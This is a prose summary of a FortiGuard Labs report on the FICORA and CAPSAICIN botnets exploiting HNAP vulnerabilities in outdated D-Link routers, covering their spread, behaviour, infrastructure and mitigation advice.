In late 2024, FortiGuard Labs identified increased activity from two botnets, “FICORA,” a variant of Mirai, and “CAPSAICIN,” a Kaiten variant, exploiting vulnerabilities in D-Link routers. Affected devices include D-Link DIR-645, DIR-806, GO-RT-AC750, and DIR-845L models with outdated firmware. These vulnerabilities, particularly in the Home Network Administration Protocol (HNAP) interface, allow remote attackers to execute malicious commands. The issue stems from multiple documented vulnerabilities, such as CVE-2015-2051 and CVE-2024-33112, all related to HNAP command execution vulnerabilities, first discovered nearly a decade ago.
Both botnets employ methods to spread rapidly and execute malicious downloads on compromised systems. “FICORA” utilizes a downloader script named “multi,” which incorporates various downloading methods—like wget and tftp—to install the malware. The script also kills processes associated with previous malware, ensuring that “FICORA” remains the dominant threat on the network. It targets various Linux architectures, employing ChaCha20 encryption to protect its configuration and command-and-control (C2) server details.
In contrast, the “CAPSAICIN” botnet became notably active over a short period, targeting East Asian countries. Its downloader script “bins.sh” also aims for multiple Linux architectures and ensures its persistence by eliminating other known botnet processes upon installation. CAPSAICIN subsequently opens a connection to its C2 server, reporting the OS information of the infected host. Both botnets are characterized by their capabilities for distributed denial-of-service (DDoS) attacks, leveraging multiple protocols.
Telemetry data from FortiGuard indicates that the infrastructure utilized by the “FICORA” botnet was centralized in the Netherlands, allowing for global targeting that wasn’t geographically specific. Meanwhile, CAPSAICIN’s attack activity was largely confined to a two-day window in October 2024.
Despite the existence of patches for the vulnerabilities exploited by both botnets, attacks remained prevalent due to many organizations failing to secure their firmware against older exploits. The vulnerabilities exploited are listed under various CVEs, and FortiGuard Labs has developed intrusion prevention signatures and antivirus detection mechanisms to combat these attacks. Organizations are encouraged to maintain updated firmware and utilize cybersecurity solutions, such as those provided by Fortinet, including FortiClient, FortiGate, and the FortiGuard AntiVirus engine.
Additionally, organizations are advised to engage in proactive training and awareness strategies for their staff regarding cybersecurity threats, especially those related to phishing attacks, to fortify defenses against such intrusions.
To summarize, the resurfacing of these botnets highlights the importance of regular device updates to mitigate vulnerabilities. Despite advancement in cybersecurity measures, the legacy threats pose significant risks, necessitating robust security practices and constant vigilance against potential exploits.
FortiGuard analytics allow for blocking of the C2 servers associated with these botnets along with proactive measures against recognized malicious sources, emphasizing the need for a comprehensive security strategy that combines updated technology, threat intelligence sharing, and user education. If organizations suspect that they may have been impacted by these threats, reaching out to cybersecurity professionals for incident response is critically recommended.